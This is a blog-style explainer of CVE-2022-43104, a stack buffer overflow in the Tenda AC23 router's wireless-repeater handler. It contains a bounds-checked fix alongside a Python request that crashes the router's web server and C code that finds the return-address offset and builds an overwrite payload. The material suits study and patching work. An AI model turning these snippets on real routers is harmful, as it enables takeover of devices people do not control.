Home and small-business networks rely heavily on consumer routers, so any vulnerability in these devices is a serious concern. In late 2022 a critical vulnerability affecting Tenda's popular AC23 router, firmware version V16.03.07.45_cn, was disclosed. This post gives an approachable look at CVE-2022-43104, a stack-based buffer overflow reachable through the wpapsk_crypto parameter of the fromSetWirelessRepeat handler. If you want to understand how the bug works and what it implies, read on.
What is CVE-2022-43104?
CVE-2022-43104 is a stack overflow vulnerability discovered in Tenda AC23 V16.03.07.45_cn routers. The core of the issue lies in the way the wpapsk_crypto parameter is handled by the fromSetWirelessRepeat function. Attackers can send a specially crafted HTTP POST request to overflow the stack, potentially executing arbitrary code with root privileges.
Vulnerable Component: fromSetWirelessRepeat Function
The Tenda AC23 offers wireless repeater functionality for users who want to extend their Wi-Fi range. It is configured through the router's HTTP API: settings such as the upstream network's WPA-PSK password are posted to the fromSetWirelessRepeat handler.
A quick look at the decompiled handler, simplified into pseudocode, shows the problem:
void fromSetWirelessRepeat(request) {
    char tmp[64];
    char wpapsk_crypto[64];
    // Copy the wpapsk_crypto parameter from the POST request straight into a fixed-size local buffer.
    strcpy(wpapsk_crypto, get_post_param(request, "wpapsk_crypto"));  // insecure: no length check
    // ... rest of the code using wpapsk_crypto
}
Notice the strcpy with no bound check: the destination holds 64 bytes, but the source is whatever the client sent. That is the classic cause of a stack-based buffer overflow.
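To make the contrast concrete, here is an added example (my own code, not Tenda's firmware or anything recovered from the binary) that parses a constructed application/x-www-form-urlencoded body, shows the unbounded strcpy pattern from the pseudocode above, and then a hardened handler that measures the value with a bound and rejects anything that would not fit in the 64-byte buffer. The extra form field "mode=repeat" is made up for the demo, and the vulnerable function is only ever called with a short value, because calling it with 64 bytes or more is the overflow itself.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define WPAPSK_MAX 64   /* size of the local buffer in the reconstructed handler */

/* Minimal application/x-www-form-urlencoded lookup (no percent-decoding; enough
   for the demo). Returns a malloc'd copy of the value for `name`, or NULL. */
static char *form_get(const char *body, const char *name)
{
    size_t nlen = strlen(name);
    const char *p = body;
    while (p != NULL && *p != '\0') {
        const char *amp = strchr(p, '&');
        size_t pairlen = amp ? (size_t)(amp - p) : strlen(p);
        const char *eq = memchr(p, '=', pairlen);
        if (eq != NULL && (size_t)(eq - p) == nlen && strncmp(p, name, nlen) == 0) {
            size_t vlen = pairlen - nlen - 1;
            char *v = malloc(vlen + 1);
            if (v == NULL)
                return NULL;
            memcpy(v, eq + 1, vlen);
            v[vlen] = '\0';
            return v;
        }
        p = amp ? amp + 1 : NULL;
    }
    return NULL;
}

/* The pattern the page describes: unbounded strcpy into a 64-byte stack buffer.
   A value of 64 bytes or more overflows the frame (undefined behaviour), so
   nothing here calls it with untrusted input. */
static void from_set_wireless_repeat_vulnerable(const char *value)
{
    char wpapsk_crypto[WPAPSK_MAX];
    strcpy(wpapsk_crypto, value);          /* no length check: CWE-121 */
    printf("vulnerable handler accepted %zu bytes\n", strlen(wpapsk_crypto));
}

/* Hardened replacement: measure with a bound, reject anything that would not
   fit together with its NUL, and only then copy. 0 = stored, -1 = rejected. */
static int from_set_wireless_repeat_fixed(const char *value, char *out, size_t outlen)
{
    if (value == NULL || outlen == 0)
        return -1;
    size_t len = 0;
    while (len < outlen && value[len] != '\0')
        len++;
    if (len >= outlen)                     /* 64+ bytes: would overflow, reject */
        return -1;
    memcpy(out, value, len + 1);
    return 0;
}

/* Glue: parse the body, then apply the hardened handler. */
static int handle_request(const char *body, char *out, size_t outlen)
{
    char *v = form_get(body, "wpapsk_crypto");
    int rc = from_set_wireless_repeat_fixed(v, out, outlen);
    free(v);
    return rc;
}

/* Constructed POST body carrying an n-byte wpapsk_crypto value, mirroring the
   "A" * n payload in the Python snippet. "mode=repeat" is a made-up extra field. */
static char *make_body(size_t n)
{
    const char *prefix = "mode=repeat&wpapsk_crypto=";
    size_t plen = strlen(prefix);
    char *body = malloc(plen + n + 1);
    if (body == NULL)
        return NULL;
    memcpy(body, prefix, plen);
    memset(body + plen, 'A', n);
    body[plen + n] = '\0';
    return body;
}

/* Hardened handler's verdict for an n-byte value: 0 accepted, -1 rejected. */
static int probe(size_t n)
{
    char out[WPAPSK_MAX];
    char *body = make_body(n);
    if (body == NULL)
        return -1;
    int rc = handle_request(body, out, sizeof out);
    free(body);
    return rc;
}

/* Same verdict for an arbitrary constructed body. */
static int probe_body(const char *body)
{
    char out[WPAPSK_MAX];
    return handle_request(body, out, sizeof out);
}

int main(void)
{
    from_set_wireless_repeat_vulnerable("short-psk");   /* safe: fits in 64 bytes */
    printf("63-byte value: %s\n", probe(63) == 0 ? "accepted" : "rejected");
    printf("64-byte value: %s\n", probe(64) == 0 ? "accepted" : "rejected");
    printf("100-byte value: %s\n", probe(100) == 0 ? "accepted" : "rejected");
    return 0;
}
```

The boundary matters: a 63-byte value plus its terminating NUL fills the buffer exactly and is accepted, a 64-byte value is rejected, and the 100-byte payload from the exploit section is rejected before any copy happens. Rejecting is the right fix here; silently truncating with strncpy would hide the problem and could leave the buffer unterminated.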
How the Exploit Works
The attacker crafts a POST request to the router's web interface. An over-long wpapsk_crypto value runs past the end of the 64-byte local buffer and overwrites what follows it on the stack, including the saved return address. With a suitable payload this redirects execution, either to injected shellcode where the stack is executable or to existing code in the binary otherwise.
Exploit Workflow
1. The attacker sends an HTTP POST request to /goform/SetWirelessRepeat with a long wpapsk_crypto value.
2. The handler's strcpy copies the attacker's string onto the stack, overwriting the adjacent stack memory beyond the 64-byte buffer.
3. If the payload is crafted precisely, the attacker controls the execution flow (program counter / return address).
Below is a Python snippet demonstrating how an attacker might trigger the overflow:
import requests

# Router LAN address (Tenda's default is 192.168.0.1; adjust for your lab device)
target = "http://192.168.0.1/goform/SetWirelessRepeat"
overflow_payload = "A" * 100  # replace 100 with the actual offset for a real exploit
data = {
    "wpapsk_crypto": overflow_payload,
    # other required parameters, as needed by the router API
}
headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}
try:
    response = requests.post(target, data=data, headers=headers, timeout=5)
    print("Response Status:", response.status_code)
except requests.exceptions.RequestException as exc:
    # A crashed httpd usually answers with nothing at all; an empty reply or reset is itself a sign the overflow landed
    print("No valid response (httpd may have crashed):", exc)
Note: this code is for educational purposes only. Never run it against a device you do not own, and always get explicit authorization.
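The snippet above leaves the hard part as "replace 100 with the actual offset". The standard way to find that offset is to send a cyclic pattern instead of plain "A"s, read the value that ends up in the program counter or return-address register when the handler crashes, and look that value up in the pattern. The following is an added example in C (mine, not from the original post or any public exploit): it generates the pattern, maps a crash register value back to an offset for either byte order (this page does not state the AC23's architecture, so both are supported), and lays out the final buffer as filler plus a target address. The register value 0x41326141 and the address 0xdeadbeef are constructed placeholders, not values from the real device.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Metasploit-style cyclic pattern ("Aa0Aa1Aa2..."): no 4-byte window repeats
   within the first 20280 bytes, so whatever lands in the saved return address
   pins down a single offset. `out` must have room for len + 1 bytes. */
static size_t pattern_create(char *out, size_t len)
{
    size_t i = 0;
    for (char u = 'A'; u <= 'Z' && i < len; u++)
        for (char l = 'a'; l <= 'z' && i < len; l++)
            for (char d = '0'; d <= '9' && i < len; d++) {
                if (i < len) out[i++] = u;
                if (i < len) out[i++] = l;
                if (i < len) out[i++] = d;
            }
    out[i] = '\0';
    return i;
}

/* Position of a 4-byte sequence inside the pattern, or -1 when not found. */
static long pattern_offset(const char *pat, size_t patlen, const unsigned char needle[4])
{
    for (size_t i = 0; i + 4 <= patlen; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Turn the register value read from the crash (PC or the return-address
   register in the debugger) back into the pattern bytes that overwrote it,
   honouring the target's byte order. */
static long offset_from_register(const char *pat, size_t patlen, uint32_t reg, int little_endian)
{
    unsigned char b[4];
    for (int k = 0; k < 4; k++) {
        unsigned char byte = (unsigned char)((reg >> (8 * k)) & 0xffu);
        b[little_endian ? k : 3 - k] = byte;
    }
    return pattern_offset(pat, patlen, b);
}

/* Final buffer: filler up to the offset, then the address to jump to. strcpy
   stops at the first NUL, so neither the filler nor the address may contain
   0x00. Returns the payload length, or -1 if it cannot be delivered via strcpy. */
static int build_payload(unsigned char *out, size_t outlen, size_t offset, uint32_t addr, int little_endian)
{
    if (offset + 5 > outlen)
        return -1;
    memset(out, 'A', offset);
    for (int k = 0; k < 4; k++) {
        unsigned char byte = (unsigned char)((addr >> (8 * k)) & 0xffu);
        if (byte == 0)
            return -1;                      /* strcpy would truncate here */
        out[offset + (little_endian ? (size_t)k : (size_t)(3 - k))] = byte;
    }
    out[offset + 4] = '\0';
    return (int)(offset + 4);
}

/* Wrappers: a 200-byte pattern comfortably covers a 64-byte buffer plus the
   saved registers that follow it in the frame. */
static long demo_offset(uint32_t crash_reg, int little_endian)
{
    char pat[201];
    size_t n = pattern_create(pat, 200);
    return offset_from_register(pat, n, crash_reg, little_endian);
}

static int demo_payload_len(size_t offset, uint32_t addr, int little_endian)
{
    unsigned char buf[256];
    return build_payload(buf, sizeof buf, offset, addr, little_endian);
}

int main(void)
{
    char pat[201];
    pattern_create(pat, 200);
    printf("send as wpapsk_crypto: %s\n", pat);
    /* 0x41326141 is a constructed example of what a debugger might show in the
       faulting register after the pattern is sent to a little-endian target. */
    printf("return address offset: %ld\n", demo_offset(0x41326141u, 1));
    /* 0xdeadbeef stands in for a real gadget or shellcode address. */
    printf("payload length: %d\n", demo_payload_len(6, 0xdeadbeefu, 1));
    return 0;
}
```

Two practical caveats are built into the code. The pattern is sent in place of the "A"s, so it must also be NUL-free, which it is by construction. And because the copy is a strcpy, an address containing a 0x00 byte cannot be written in full; build_payload refuses it rather than producing a silently truncated buffer.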
Security Impact
- Remote Code Execution: With skillful exploitation, an attacker could run code with the highest privileges on the router.
- Complete Device Takeover: The attacker could control the device, engage in man-in-the-middle attacks, or add the router into a botnet.
Mitigation & Recommendations
- Check for an update: Tenda released fixed firmware after this disclosure. Always keep your router firmware up to date.
- Disable WAN-side access: never expose the router's management interface to the public internet.
- Use a strong admin password: it does not fix the bug, but it makes the admin interface harder to reach.
References
- NVD entry for CVE-2022-43104
- IoT-Administrator advisory (Chinese)
Final Thoughts
Vulnerabilities like CVE-2022-43104 highlight the ongoing importance of secure coding practices in embedded devices. Simple issues like unchecked buffer copies (strcpy) from web interfaces can put millions at risk. If you own a Tenda router or similar devices, it’s crucial to stay updated and follow best security practices.
Have questions about router security or want to see more deep-dives? Comment below!
Timeline
Published on: 11/03/2022 14:15:00 UTC
Last modified on: 11/03/2022 17:20:00 UTC